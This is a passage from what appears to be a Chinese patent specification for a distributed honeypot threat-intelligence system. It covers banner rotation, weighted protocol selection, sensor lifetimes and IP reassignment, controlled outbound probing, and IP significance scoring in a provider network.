在一些实施例中,威胁数据收集器的特定特性可能与特定参与者相关联和/或来自特定网络地址。例如,如果同一参与者多次尝试发起与威胁传感器的入站连接,那么处理所述入站通信的威胁数据收集器可能会在更长的时间周期内,甚至在威胁传感器的整个生命周期内,为所述参与者保持相同特性。换句话说,同一参与者在其后续访问尝试中会接收到完全相同的横幅和完全相同的特性,即使这些后续访问尝试发生在威胁数据收集器为响应来自不同参与者的命令而呈现不同横幅和不同特性的其它时间周期内。例如,在第一次访问尝试中被呈现一种类型的横幅的第一参与者可能在后续的访问尝试中被呈现有相同的横幅(例如,即使在特定时间周期到期后),而威胁数据收集器针对其他参与者的第一次访问尝试向那些其他参与者呈现不同的或旋转的横幅。在一些实施例中,被呈现有一种类型的横幅以及系统响应命令的特定特性的第一参与者可能在后续的访问尝试中收到与此第一参与者在其第一次访问尝试中收到的相同的横幅和那些特性。所述第一参与者可在后续的访问尝试中收到相同的横幅和那些相同的特性,即使有不同的参与者在其访问尝试中收到不同的横幅和不同的特性,其中这些访问尝试发生的时间与第一参与者的后续访问尝试发生的时间相同或相似或接近。
[0065]
在一些实施例中,威胁数据收集器可使用基于权重的特性来确定响应传入通信而呈现的特定特性。例如,威胁数据收集器可配置成在第一特定百分比的时间内使用特定横幅响应,同时所述威胁数据收集器配置成在第二特定百分比的时间(可以是与第一特定百分比的时间相同或不同的百分比)内使用另一横幅响应。作为另一实例,可以给池中的每个特性赋予特定的权重,以便基于其权重占整个池的总权重的比例使用特定的特性。还有其它方法可以使用基于权重的特性来确定响应传入通信而呈现的特定特性。
[0066]
在一些实施例中,更改威胁传感器中威胁数据收集器呈现的特性允许威胁传感器吸引并接触更多参与者。可能有许多不同类型的扫描程序或恶意软件或僵尸网络或其它类型的恶意参与者正在扫描系统,以识别目标,无论是在整个ip地址范围内,还是在ip地址范围的特定部分内,还是在整个特定ip地址范围中随机进行。如果威胁数据收集器始终使用相同的横幅进行响应,那么威胁数据收集器可能只会吸引很少的参与者。例如,如果威胁数据收集器响应于http请求而仅用tomcat响应,那么威胁数据收集器可能不会吸引对tomcat不感兴趣的其他参与者。这些其他参与者可能对其它类型的网络服务器感兴趣。
[0067]
威胁传感器部署和管理组件可以通过使参与者用于微调其攻击的可暴露信息的类型多样化,最大限度地提高每个威胁数据收集器吸引的参与者的类型。例如,如果恶意参与者看到tomcat版本1.8,那么参与者将希望发送特定类型的有效负载以利用特定类型的攻击载体,而如果参与者看到版本2.1,那么他们将希望发送不同的有效负载。通过暴露各种不同的响应,整个威胁传感器就有机会吸引更多不同类型的参与者。
[0068]
威胁数据收集器可能绑定到特定端口,或者可能用于威胁传感器的多个端口,这取决于实施例。例如,威胁传感器可包含用于不同类型协议(如http、telnet、nttp和ssh)的威胁数据收集器。这些威胁数据收集器中的每一个通常都可以绑定到一个或多个特定端口。然而,在一些实施例中,不同的服务可以在同一端口上运行。如果威胁传感器部署和管理组件仅将一种类型的威胁数据收集器绑定到可能用于多种类型的通信的端口,那么所述
威胁传感器可能会丢失一些恶意活动,这些活动可能针对可能绑定到同一端口号的其它服务。例如,telnet和ssh都可以绑定到端口23。因此,如果威胁传感器仅包含端口23上telnet的威胁数据收集器,那么针对端口23上ssh的参与者将不再与所述威胁传感器交互,因为这些参与者希望ssh在那里运行。
[0069]
在一些实施例中,威胁传感器可以在流量传递到任何威胁数据收集器之前执行一层网络流量分析。威胁传感器可以动态和/或启发性地确定哪一个威胁数据收集器是预期目标。在一些实施例中,这可以基于传入有效负载的初始部分。例如,在一些实施例中,威胁传感器可能能够确定入站通信是ssh还是http请求。
[0070]
然而,在某些情况下,客户端侧除了打开连接外,不会向威胁传感器发送任何内容。在这些情况下,最初的答案必须来自威胁传感器。例如,telnet可以这样操作。在这些情况下,客户端侧希望在继续之前看到一些东西。例如,客户端侧可能希望在继续之前看到横幅或提示。还有客户端侧希望在iot环境中继续之前看到一些东西的其它实例。例如,iot装置可以具有专有类型的telnet,它在客户端侧发送完成tcp连接以外的任何内容之前,用不同类型的信息进行响应。
[0071]
因此,在某些情况下,威胁传感器可能不知道客户端侧参与者在打开连接时使用的协议。例如,客户端可能连接到端口23,而不指示其预期使用的协议或通信,也不提供来自客户端侧的任何类型的有效负载。在这些情况下,在一些实施例中,威胁传感器可以通过随机选择一个可能绑定到所述端口的适当威胁数据收集器来实施服务的随机选择。在一些实施例中,威胁数据收集器的此选择也可以基于权重。例如,威胁传感器可能会为telnet赋予权重3,为专有数字录像机(“dvr”)协议赋予权重1,因此,4次中有3次威胁传感器将使用telnet提示进行响应,并且4次中有1次威胁传感器会使用专有数字录像机(“dvd”)协议api预期的提示或协议进行响应。在一些实施例中,基于权重的模式将是基于超时的模式,这意味着只有在等待客户端发送内容的一段时间后才会切换到基于权重的模型,如果客户端没有发送任何可用于对有效负载进行启发式分析的内容,那么会切换到基于权重的模式。在一些实施例中,威胁传感器可以基于时间或超时回退到基于权重的机制。
[0072]
在一些实施例中,当确定哪个服务或威胁数据收集器将暴露给特定端口上的传入通信时,威胁传感器可以监测哪一个服务或哪些服务最终更频繁地与入站通信的参与者接触。然后,在一些实施例中,威胁传感器或威胁传感器部署和管理组件可以基于此类监测调整用于响应传入通信的服务。例如,威胁传感器可以调整基于权重的方法中使用的权重,以选择暴露给或响应传入通信的服务或威胁数据收集器。威胁传感器可能会增加更频繁地参与进传入通信的服务或威胁数据收集器的权重。在一些实施例中,权重可以动态调整。因此,威胁传感器,或一些实施例中的威胁传感器部署和管理组件,可以基于参与者接触更多的服务或威胁数据收集器来学习。例如,如果今天在端口200上,telnet协议比其它协议接收到更多的接触,那么在选择暴露给或响应端口200上的传入通信的服务时,可以为实施telnet协议的威胁数据收集器赋予更高的权重。在一些实施例中,可以跨多个威胁传感器进行此权重调整。威胁传感器可能会将权重调整传送给威胁情报系统,例如威胁情报系统的威胁传感器部署和管理组件,而威胁情报系统可能会将此信息传送给其它威胁传感器。在其它实施例中,威胁传感器可以相互通信,以协调特定服务或威胁数据收集器的权重调整。一些或所有威胁传感器也可以出于多种其它目的相互通信。
[0073]
在一些实施例中,当威胁传感器将服务绑定到端口时,例如将特定威胁数据收集器分配到端口时,威胁传感器不必将单个服务或威胁数据收集器绑定到端口,而是可能允许多个威胁数据收集器在单个端口中操作。加密信息也可能如此。例如,从客户端侧的参与者接收到的信息可能会被加密。通常在http服务器中,预期tls流量的https版本绑定到端口443,这就是tls协商发生的地方,如果客户端连接到端口80,那么不会发生tls协商。
[0074]
但是,在一些实施例中,威胁传感器不必将特定服务(如https)绑定到特定端口(如443),但可以将服务动态分配到端口。在这些实施例中,威胁传感器可以检查交互请求中的初始有效负载,以查看正在使用哪种协议或通信方法。如果交互请求是针对加密协议的,那么威胁传感器可以在将通信发送到适当的威胁数据收集器之前建立加密。例如,如果威胁传感器识别到传入的tls握手请求,那么威胁传感器可以完成tls握手,切换到解密流量,然后将流量传递给负责确定哪个威胁数据收集器将接收经解密流量的层。然后,所述层可以确定哪个威胁数据收集器负责处理与发起入站通信的计算参与者的通信。通过这种方式,在一些实施例中,威胁传感器可以针对任何可用协议在威胁传感器之一的任何端口上处理入站通信,并且威胁传感器可使用所述协议进行通信。例如,参与者可以使用https连接到其中一个威胁传感器中的任何端口,威胁传感器将使用http进行应答。作为另一实例,参与者可以使用ssh连接到任何端口,威胁传感器将使用ssh进行应答。因此,在一些实施例中,同一端口可以用许多不同的协议进行应答。在一些实施例中,威胁传感器用来应答的协议可能取决于威胁传感器用于分析和决策的启发式。
[0075]
在一些实施例中,威胁传感器可与动态寿命相关联。例如,每个威胁传感器可能具有动态设置的预定寿命。作为一个实例,80%的威胁传感器的寿命可能为2小时,10%的威胁传感器的寿命可能为24小时,10%的威胁传感器的工作时间可能为一周。在其寿命结束后,威胁传感器可能会重新启动,或者威胁传感器部署和管理组件可能会重新供应和/或部署和/或配置新的威胁传感器(可能与寿命到期的威胁传感器不同或相同)。
[0076]
不同威胁传感器的不同寿命将吸引不同类型的参与者。一些参与者从进行初始扫描到进行下一个交互阶段之间存在间隙。进一步的阶段可能是参与者显示越来越多关于他们自己和他们活动的信息。例如,在威胁传感器运行时间最短的情况下,例如2小时,如果参与者没有在这2小时内完成整个攻击,那么威胁情报系统将丢失有关所述参与者的一些信息。因此,一些威胁传感器具有更长的寿命,以确保这些类型的参与者更有可能完成攻击,或至少取得进一步进展。例如,恶意参与者可能首先通过初始扫描识别易受攻击的目标,然后在数小时甚至数天之后可能会返回到这些易受攻击的目标并进行攻击。然后,威胁传感器仍然存在,并且存在于同一ip地址,用于所述参与者的配置相同,以便参与者可以继续接触它。
[0077]
在一些实施例中,当重新启动、重新供应、部署和/或配置新威胁传感器时,可以为所述新威胁传感器指派新的网络地址(例如ip地址)。例如,威胁传感器部署和管理组件可以在提供商网络的多个不同地理区域的不同网络地址部署新威胁传感器,并根据部署计划进行配置。在一些实施例中,可以释放寿命到期的威胁传感器的以前ip地址,并为新威胁传感器添加新的ip地址。
[0078]
在一些实施例中,为新威胁传感器指派新的和/或不同的ip地址可以在ip地址范围内增加整个威胁情报系统的虚拟存在。例如,如果一个威胁传感器在一周内使用相同的
ip地址运行,而不是在有限数目的ip地址上运行,那么为威胁传感器使用不同的ip地址将显著增加威胁传感器在ip地址范围内所处位置的覆盖范围。将新的和/或不同的ip地址指派给新威胁传感器的另一个优点是,可以降低实体认识到所采用的ip地址对应于威胁传感器的风险。如果一个实体认识到所采用的ip地址对应于威胁传感器,那么所述实体可能会将这些ip地址发布为属于威胁传感器的ip地址,这样恶意参与者就可以主动避开这些ip地址。威胁传感器可能接收不到那么多流量。在ip地址空间中动态移动威胁传感器可以提供更广泛的范围,使得威胁传感器更难被列入黑名单。如果这些威胁传感器的ip地址不断变化,那么将威胁传感器列入黑名单将更加困难。
[0079]
在一些实施例中,对于恶意交互,不仅存在入站交互,例如发送http请求或打开ssh通道,还存在出站交互。例如,在恶意参与者访问装置后,他们通过ssh登录,然后使用被破坏的装置连接到其它地方下载另一种恶意可执行文件。例如,受感染的装置可能会发起出站交互以下载比特币挖掘软件,然后连接到另一个地方,即挖掘池,以基于来自挖掘池的指令启动挖掘活动。
[0080]
在一些实施例中,通过威胁情报系统的威胁传感器以及低交互或中等交互威胁数据收集器,出站交互并不会真正发生。在一些实施例中,为了捕获信息,威胁数据收集器可以处理有效负载,然后发起虚假或虚拟出站交互。如果威胁数据收集器发现有效负载中存在某种形式的url或ip地址或域名,那么威胁数据收集器可以以可控的方式开始探测出站关系。例如,如果有效负载中嵌入了url,那么威胁数据收集器可以尝试下载位于所述url的文件,以查看其包含的内容类型。
[0081]
出站交互有助于整理威胁情报,例如通过分布式威胁传感器数据聚合和数据导出组件和/或分布式威胁传感器分析和相关服务组件。这是因为当涉及到入站交互时,与入站通信相关联的ip地址可能是与非常大的网络相关联的ip地址,例如,它可能最终只是一个代理。或者,在一些实施例中,与入站通信相关联的ip地址可能是具有易失性生存期的某个地方的ip地址,因此ip地址在消失之前仅在一两天内处于活动状态。因此,例如,如果将所述网络地址列入黑名单,那么威胁情报系统可能只会将恶意参与者发布所述ip地址后继承所述ip地址的人列入黑名单。
[0082]
在一些实施例中,出站交互之所以发挥作用,是因为通过出站交互,威胁情报系统可以确定ip地址是否仍在用于恶意活动和/或它是不是专门用于恶意活动的地址。如果通过出站交互访问的ip地址上存在恶意文件,那么威胁情报系统可以确定所述恶意文件是否仍存在或是否已消失。例如,如果恶意参与者将某个ip地址回收给其他人,那么不应该从所述ip地址或之前观察到的对应url获取相同的有效负载。
[0083]
在一些实施例中,威胁传感器和/或相关联的威胁数据收集器可以持续刷新出站交互。例如,每小时可以配置一个威胁数据收集器来获取和/或连接出站关系,以查看它们是否仍保留最初观察到的有关它们的信息。在一些实施例中,如果出站关系仍然保留最初观察到的关于它们的信息,那么威胁数据收集器和/或威胁传感器可以刷新系统中有关所述ip地址的信息。在一些情况下,ip地址将仅与入站交互相关联,而在一些情况下,ip地址仅与出站交互相关联,因为它们仅用于托管恶意软件或托管命令和控制服务器。然而,在一些情况下,用于扫描威胁传感器入站通信的相同ip地址也用于托管恶意软件、托管报告服务器或托管恶意活动的命令和控制服务器。在一些实施例中,在针对单个ip地址同时观察
到入站交互和出站交互两者的情况下,可以更有把握地知道此ip地址存在恶意,即使不知道有效负载的内容。如果威胁情报系统想要采取更具侵入性的行动,例如阻止来自所述ip地址的流量,那么这不太可能造成不必要的某种中断。
[0084]
威胁传感器部署和管理组件
[0085]
威胁传感器部署和管理组件可以将部署和/或配置从单个威胁传感器扩展到多个威胁传感器。在一些实施例中,威胁传感器部署和管理组件可以管理威胁传感器以及与威胁传感器相关联的每个威胁数据收集器的配置和部署。在一些实施例中,威胁传感器部署和管理组件还可以管理威胁传感器。在一些实施例中,它可以确定威胁数据收集器的类型、每个威胁数据收集器实施的交互类型、功能和配置方式。例如,威胁传感器部署和管理组件可以确定威胁数据收集器是中等交互还是低交互。在一些实施例中,威胁传感器部署和管理组件还可以确定组成每个威胁传感器的威胁数据收集器的数目和类型。在一些实施例中,威胁传感器部署和管理组件可以确定威胁传感器运行的时间范围,以及威胁传感器的启动、重新启动和分布。
[0086]
在一些实施例中,威胁传感器部署和管理组件可通过确定部署计划执行这些管理功能。在一些实施例中,威胁传感器部署和管理组件可确定多个威胁传感器的部署计划,其中各个威胁传感器指定多个不同类型的威胁数据收集器中的一个或多个威胁数据收集器。在一些实施例中,所述不同类型的威胁数据收集器中的至少一些可使用不同的通信协议或通信端口,或者提供不同的针对入站通信的响应。在一些实施例中,威胁传感器部署和管理组件的部署计划还可为威胁传感器指定不同寿命。在一些实施例中,威胁传感器部署和管理组件可在多个不同地理区域中的多个不同网络地址处部署所述多个威胁传感器,并根据部署计划进行配置。在一些实施例中,威胁传感器部署和管理组件可从已部署威胁传感器收集威胁数据,并基于收集到的威胁数据和威胁传感器的不同寿命,确定调整后的部署计划,包括对部署计划的一个或多个调整。在一些实施例中,威胁传感器部署和管理组件可根据调整后的部署计划,在一个或多个地理区域中执行对威胁传感器的调整。
[0087]
在一些实施例中,威胁传感器部署和管理组件可以在大量区域部署威胁传感器,每个区域可以有大量威胁传感器。例如,威胁传感器部署和管理组件可以在19个区域部署威胁传感器,每个区域至少可以运行数百个威胁传感器。
[0088]
在一些实施例中,为了增加覆盖范围,需要在越来越多的地方安装威胁传感器,例如越来越多的ip地址,以增加被恶意参与者运行的扫描程序检测到的机会。例如,一些扫描程序按顺序操作,以便以顺序方式跟踪所有ip地址。一些扫描程序生成随机ip地址,并命中这些ip地址。在扫描程序按顺序或随机操作的情况下,威胁传感器部署和管理组件只需将重点放在在更多ip地址部署威胁传感器以增加覆盖范围。但是,还有另一组扫描程序跟踪特定区域。这些扫描程序知道特定类型的装置在某个区域更为常见,因此这些扫描程序只命中所述区域的ip地址,甚至可能是特定国家的ip地址。因此,如果威胁传感器部署和管理组件想要针对特定类型的恶意攻击,那么它可能希望在特定区域部署更多威胁传感器。
[0089]
在一些实施例中,威胁传感器部署和管理组件可以是分布式的。威胁传感器部署和管理组件的一些功能可位于威胁传感器的代码中。威胁传感器部署和管理组件的一些功能可位于提供商网络形成堆栈的配置中,例如位于自动缩放功能中。但是,即使在使用自动缩放时,一些管理功能也必须创建并运行包含所有正确配置参数的提供商网络形成模板。
但是,一些或全部功能可能位于单独的威胁传感器部署和管理组件中,所述组件可以动态更改威胁传感器组和/或威胁传感器相关联的每个威胁数据收集器的配置。
[0090]
在一些实施例中,威胁传感器部署和管理组件可以采用动态机制来吸引更多参与者和/或更多信息。如果威胁传感器正在运行,并且接收到许多入站通信,例如越来越多的参与者正在对其进行检测,从而引入越来越多的信息,那么威胁传感器和/或威胁传感器部署和管理组件可以为所述特定威胁传感器保持更长的寿命。作为另一实例,在威胁传感器的健康受到攻击的情况下,例如受到拒绝服务攻击,威胁传感器的寿命可能会缩短。威胁传感器可以在其初始关联寿命结束之前释放到池中。在一些实施例中,这可以保护整个装置组免受这些类型的滥用活动。
[0091]
在一些实施例中,威胁传感器部署和管理组件还可以根据这些区域的活动改变不同区域中威胁传感器的数目。在一些实施例中,区域中可能存在固定数目的威胁传感器。这一固定数字在不同区域可能相同,或者可能因区域而异。然而,在其它实施例中,一个或多个区域中的威胁传感器的数目可以动态变化。例如,在一些区域,实际上有更多的活动,这些区域正在收集更多的情报。在这些情况下,威胁传感器部署和管理组件可以动态决定不同区域的威胁传感器组的规模,以增加威胁传感器在具有更多攻击的目标区域中的存在。
[0092]
在一些实施例中,威胁传感器部署和管理组件还可以利用许多不同的保护机制来避免歪曲从单个参与者接收到的数据。例如,威胁传感器部署和管理组件可以对每个威胁传感器的通过udp协议捕获的交互次数设置上限。例如,这可能是因为对于udp协议,来源ip地址可能是伪造的。例如,恶意参与者可能会确定已部署威胁传感器实际上是为了收集威胁情报而设计的,并且可能开始向威胁传感器馈送各种伪造的来源ip地址,并馈送不太可靠的信息。然而,并非所有参与者都是这样,威胁传感器可能不想丢失这些信息,因为对于许多参与者来说,由于其家庭网络的限制,例如特定的isp地址范围,他们无法提供伪造的来源ip地址。然而,在一些实施例中,对于可以提供伪造ip地址的情况,威胁传感器部署和管理组件和/或已部署威胁传感器可以使用自我机制来限制每个威胁传感器的udp流量。
[0093]
即使来源ip地址实际不是可伪造的,但威胁传感器部署和管理组件也可能使用不同的保护机制来避免歪曲从单个参与者接收到的数据。例如,使用tcp协议,来源ip地址并不像udp世界中的来源ip地址那样是可伪造的。然而,即使使用tcp,威胁传感器部署和管理组件也不希望单个来源ip地址向整个威胁情报系统注入太多信息。因此,在一些实施例中,威胁传感器部署和管理组件以及相关联的威胁传感器可以对通过包含tcp协议的任何协议收集的信息量实施上限。无论支持什么协议,从每个来源收集的信息量都可以受到限制。
[0094]
分布式威胁传感器数据聚合和数据导出组件
[0095]
在一些实施例中,威胁传感器收集的可疑对象交互数据可以通过处理管线移动,以增加、聚合、整理和产生可操作的威胁情报输出,作为制定安全决策的因素子集使用。在一些实施例中,来自威胁数据收集器的交互可以以某一形式的传感器日志收集,并传递到中央系统,例如分布式威胁传感器数据聚合和数据导出组件,所述组件可以将所有数据聚合成一种格式,以便更容易处理。在一些实施例中,ip地址等许多威胁指标可能太不稳定,无法独立于其它形式的安全分析进行安全警报。因此,在一些实施例中,威胁情报系统和/或分布式威胁传感器数据聚合和数据导出组件可以定期导出ip声誉数据,作为其威胁指标输出之一。
[0096]
在一些实施例中,分布式威胁传感器数据聚合和数据导出组件可以定期,例如每10分钟,导出其ip地址声誉知识的更新版本。在一些实施例中,这些导出可含有关于每个可疑ip地址交互的元数据,例如交互的传感器、协议、端口、方向、url和观察天数。在一些实施例中,可以将具有高基数的字段的上限设置为配置的成员数。
[0097]
显著性因子
[0098]
分布式威胁传感器数据聚合和数据导出组件和/或分布式威胁传感器分析和相关组件可以在分布式威胁传感器数据聚合和数据导出组件聚合来自各个威胁传感器的信息后计算显著性因子。显著性得分可以是每个ip地址的计算得分,用于指示其保真度,以便减少由于动态ip地址重新指派或可疑对象从大型网络的代理背后操作而导致的误报。在一些实施例中,每个可疑ip地址可与显著性得分相关联。
[0099]
更具体地说,在一些实施例中,为了计算ip地址的显著性得分,威胁情报系统可以使用诸如历史时间跟踪和可疑对象活动的新鲜度、可疑对象与之交互的传感器数目和网络协议类型以及观察到的与可疑对象网络的连接方向等因素。然后,在一些实施例中,基于关于已知灰度质量扫描程序和交互内容的配置知识调整计算出的值。例如,在一些实施例中,如果某一ip地址在过去3天内被频繁观察到,如果它一直与多个威胁传感器交互,如果它已经完成tcp握手(因此没有来源ip伪造),和/或如果它被引用为主动分发恶意软件二进制文件的回调网络点,那么它可以获得高显著性得分。在一些实施例中,每个可疑ip地址的显著性得分是针对某个时间点计算的,并且它基于其最新的活动模式和时间衰减因子进行演变。
[0100]
在各种不同的实施例中,可以使用数个不同的因子来计算显著性因子。在一些实施例中,可以使用的因子之一是交互的方向性。在一些实施例中,对于仅入站交互或出站交互,置信度可能会降低,但对于入站和出站交互两者,置信度可能更大。在一些实施例中,如果流量通过tcp协议,那么可能有高得多的置信度,而如果流量通过udp协议,那么置信度的上限可能仅限于中等范围。例如,udp协议很可能被欺骗,因此我们不想使用从任何udp交互中获得的ip地址来阻止任何流量。
[0101]
在一些实施例中,可用于计算显著性因子的另一因子是交互的新近度和频率。实际观察到ip地址与威胁传感器和/或威胁数据收集器交互的新近程度可用于计算显著性得分。还可以使用ip地址实际交互的频率。ip地址的参与者与多少个威胁传感器和/或在多少个不同区域进行交互也可以用于计算显著性得分。这些项可以显示ip地址的参与者参与恶意活动的积极程度。与之交互的服务类型和/或端口类型也可用于计算显著性得分。
[0102]
计算显著性得分的另一个非常重要的考虑因素是有效负载的分类。有许多并非真正恶意的扫描程序。有些扫描程序只是收集有关ip地址处系统的信息,(至少它们自己)不会将这些信息用于恶意目的。有效负载分类可用于确定每个参与者的意图。
[0103]
在一些实施例中,白名单或已知可能不是恶意的ip地址列表也可以用于计算显著性得分。在这些实施例中,白名单可用于以下情况:有一个标识符,如ip地址,不应被列入黑名单或被赋予高显著性因子;或者有信心如果为此标识符计算出高显著性得分,那么威胁情报系统的计算或方法肯定有问题。白名单可以根据白名单所针对的类别降低这些白名单标识符的显著性因子。在一些实施例中,显著性得分可以限制为白名单的显著性得分的较低范围。
[0104]
在一些实施例中,显著性得分的计算可以使用或基于来自一个或多个威胁情报系统用户的输入来执行。在一些实施例中,当显著性得分或显著性得分的计算作为服务提供给这些用户时,可以实现这一点。例如,对于用户可以提交会影响计算出的显著性得分的输入的服务,可能有一个特征、api接口或gui接口。在一些实施例中,来自用户的输入可以包括自定义评分定义、公式或要执行的自定义代码,或对提供商网络中客户提供的功能执行服务的引用,所述服务被自定义为至少部分地计算显著性得分。例如,所述服务可以提供一个评分构建器工具,用户可以在所述工具中指定他们希望在计算显著性得分时使用的规则。在一些实施例中,用户可以指定计算至少部分地基于一个或多个聚合器记录中可用的数据。在一些实施例中,来自用户的输入可包含给出数据的各个组成部分的权重级别。来自用户的输入可能涉及显著性得分的整个计算,也可能只涉及显著性得分计算的一部分,剩下的计算留给威胁情报系统本身,这取决于实施例。
[0105]
另外,应注意,虽然本文的描述主要聚焦于ip地址作为交互来源的标识符,但在威胁情报系统的任何部分、组件或阶段,ip地址的使用可以替换为域名、url、进程或文件名和/或用户代理,而不是ip地址。在一些实施例中,威胁情报系统可以收集这些信息以及ip地址,并且可以使用此信息识别交互的来源。在一些实施例中,威胁情报系统还可以收集有关二进制文件的信息,系统观察到恶意参与者试图将这些二进制文件落在系统的威胁传感器上。这些信息也可以进行聚合,并且可以计算其显著性因子。在一些实施例中,此显著性因子可以使用与二进制文件相关联的一些其它信息来计算,例如二进制文件将落在多少个传感器上,或者通过什么协议,或者使用了什么攻击载体。在一些实施例中,这可以用于跟踪不同类型的僵尸网络,因为僵尸网络可以演变为不同类型的攻击载体。可以观察僵尸网络,以了解它们如何改变以针对不同的易受攻击装置。
[0106]
分布式威胁传感器分析和相关组件
[0107]
有时,在一些实施例中,与威胁传感器和/或威胁数据收集器的交互来自已知的服务器或参与者,或可能拥有所有权的服务器。例如,在一些实施例中,在提供商网络中,可能存在与威胁情报系统无关的计算实例,这些实例与威胁传感器和/或威胁数据收集器交互。在一些实施例中,分布式威胁传感器分析和相关组件可以确定交互来自提供商网络拥有所有权或控制权的一个或多个已知实例。在一些实施例中,可以使用一种机制来阻止这些类型的已知或受控实例、服务器或装置的滥用。很多时候,提供商网络的客户端本身可能是恶意参与者的受害者,例如,恶意参与者接管了它们的帐户,或接管了它们的实例,并开始向其它目标传播感染所述实例、服务器或装置的恶意软件。因此,提供商网络的这些受到威胁的实例、服务器或装置可能最终也会命中威胁情报系统的威胁传感器和威胁数据收集器。
[0108]
在一些实施例中,当提供商网络的客户端本身是恶意参与者的受害者时,提供商网络可以通知客户端其实例、服务器或装置受到威胁。在一些实施例中,提供商网络可以通过很少的集成工作或从提供商网络的客户端登录来实现这一点,以便提供商网络通知客户端其实例、服务器或装置受到威胁。在一些实施例中,提供商网络可以全局查看谁在使用不同的漏洞(exploit)或攻击载体与威胁传感器和威胁数据收集器通话。
[0109]
在一些实施例中,如果提供商网络知道如何联系交互的来源,例如提供商网络的客户端,那么提供商网络只需让他们知道。在一些实施例中,客户端可能不需要在其装置上放置代理,也不需要为提供商网络提供任何访问或帐户。在一些实施例中,由于提供商网络
在准确的时间范围内将实例映射到帐户,因此提供商网络可以使用此信息与客户端通信。由于提供商网络可能还具有部署威胁传感器或威胁数据收集器的历史记录,因此也可以将其提供给客户端或第三方。如果客户端或第三方自身能够查看通话对象,包含威胁传感器的ip地址,那么他们的客户端或第三方也可以使用此信息来识别自身环境中受到威胁的服务器。
[0110]
威胁情报系统的实施例
[0111]
图1示出根据一些实施例的提供商网络中的威胁情报系统的实例系统环境,所述威胁情报系统包括威胁传感器部署和管理服务、分布式威胁传感器数据聚合和数据导出服务及分布式威胁传感器分析和相关服务,在多个地理区域中部署多个威胁传感器且与客户端网络中的多个威胁传感器通信,其中威胁传感器中的一个或多个通过互联网与计算参与者交互。
[0112]
在一些实施例中,威胁情报系统100以及任何数目个其它可能服务用作服务提供商网络102的部分,并且各自包括由一个或多个数据中心和地理位置处的一个或多个电子装置执行的一个或多个软件模块。使用一个或多个电子装置(其可以是服务提供商网络102的一部分,也可以与其分开)的客户端和/或边缘装置所有者185、187可经由例如互联网190的一个或多个中间网络与服务提供商网络102的各种服务交互。在其它实例中,外部客户端或内部客户端可以编程方式与各种服务交互而不需要用户参与。
[0113]
提供商网络102使得客户端能够使用多种类型的计算相关资源中的一个或多个,例如计算资源(例如,执行虚拟机(vm)实例和/或容器、执行批量工作、执行代码而不用供应服务器)、数据/存储资源(例如,对象存储、块层级存储、数据存档存储、数据库和数据库表格等)、网络相关资源(例如,配置包含计算资源群组的虚拟网络、内容投递网络(cdn)、域名服务(dns))、应用程序资源(例如,数据库、应用程序构建/部署服务)、访问策略或角色、身份策略或角色、机器图像、路由器和其它数据处理资源,等等。这些和其它计算资源可以提供为服务,例如可执行计算实例的硬件虚拟化服务、可存储数据对象的存储服务,等等。提供商网络102的客户端(或“客户”)可使用与客户端帐户相关联的一个或多个用户帐户,但依据使用上下文,这些术语在某种程度上可以互换使用。客户端和/或边缘装置所有者可跨一个或多个中间网络190(例如,互联网)经由一个或多个接口与提供商网络102交互,例如通过使用应用程序编程接口(api)调用,经由实施为网站或应用程序的控制台,等等。接口可以是提供商网络102的控制平面的一部分或用作所述控制平面的前端,所述控制平面包含支持和启用可以更直接地提供给客户端的服务的“后端”服务。
[0114]
为了提供这些和其它计算资源服务,提供商网络102通常依赖于虚拟化技术。例如,虚拟化技术可用于使得客户端能够控制或使用计算实例(例如,利用使用可以在也可以不在底层主o/s的顶部进一步操作的超管理器操作的客操作系统(o/s)的vm、可以在也可以不在vm中操作的容器、无需底层超管理器即可在“裸机”硬件上执行的实例),其中一个或多个计算实例可以使用单个电子装置实施。因此,客户端可以直接使用由提供商网络代管的计算实例(例如,由硬件虚拟化服务提供)来执行各种计算任务。另外或替代地,客户端可以通过提交将由提供商网络执行(例如,经由按需代码执行服务)的代码来间接使用计算实例,而提供商网络又利用计算实例来执行代码——通常客户端对所涉及的底层计算实例没有任何控制或了解。
[0115]
如上文所指出,服务提供商网络使开发人员和其他用户能够更轻松地部署、管理和使用各种计算资源,包含数据库。例如,使用数据库服务,客户端可以减轻硬件供应、设置和配置、复制、集群缩放以及通常与数据库管理相关联的其它任务的许多负担。数据库服务进一步使客户端能够以最小的停机时间或性能降级来扩大或缩小表的吞吐量,并监测资源利用率和性能指标及其它特征。客户端可以轻松部署数据库,以便与各种应用程序结合使用,例如,在线购物车、工作流引擎、库存跟踪和履行系统等。
[0116]
在所描绘的实施例之一中,可以使用威胁情报系统100来检测各种类型环境中的威胁。在一些实施例中,威胁情报系统100设计成收集、整理和发布针对提供商网络、客户端网络或iot装置或网络的恶意软件和/或僵尸网络的技术指标。因此,在一些实施例中,威胁情报系统100不受边缘装置或iot装置的限制,而是可以更广泛地使用。在一些实施例中,系统包括多个威胁传感器,它们部署在不同的网络地址且物理地位于提供商网络102中的不同地理区域,例如地理区域1 180和地理区域n 182。这些地理区域可以采用威胁传感器,例如地理区域1 180中的威胁传感器140a和140b,以及地理区域n中的威胁传感器140c和140d。这些威胁传感器及其相关联的威胁数据收集器可以检测来自来源的交互。
[0117]
在一些实施例中,恶意软件威胁情报系统可包括三个独立的组件。在提供商网络的上下文中,这些组件可用作服务。这三个组件是:威胁传感器部署和管理服务110、分布式威胁传感器数据聚合和数据导出服务120,及分布式威胁传感器分析和相关服务130。并非所有这三个组件都必须存在。一个威胁情报系统可能仅含有其中一个或两个组件。除这些组件之外,系统还可含有其它组件。系统可含有包含此处列出的多个组件在不同组件配置中的功能的组件。例如,系统可能会将其中两个组件的某些功能合并到一个组件中。在各种不同的实施例中,有许多不同类型的恶意软件威胁情报系统,此处列出的特定组件详细信息不应视为具有限制性。
[0118]
在一些实施例中,威胁情报系统100可包括威胁传感器部署和管理服务110。在一些实施例中,威胁传感器部署和管理服务110可包含威胁传感器部署计划生成器112,用于确定所述多个威胁传感器的部署计划,包含威胁传感器的相关联威胁数据收集器的部署计划。可存在不同类型的威胁数据收集器。不同威胁传感器可包括不同数目和类型的威胁数据收集器。威胁数据收集器可使用不同的通信协议或端口,或者提供针对入站通信的不同类型的响应。不同的威胁传感器还可具有不同的寿命。
[0119]
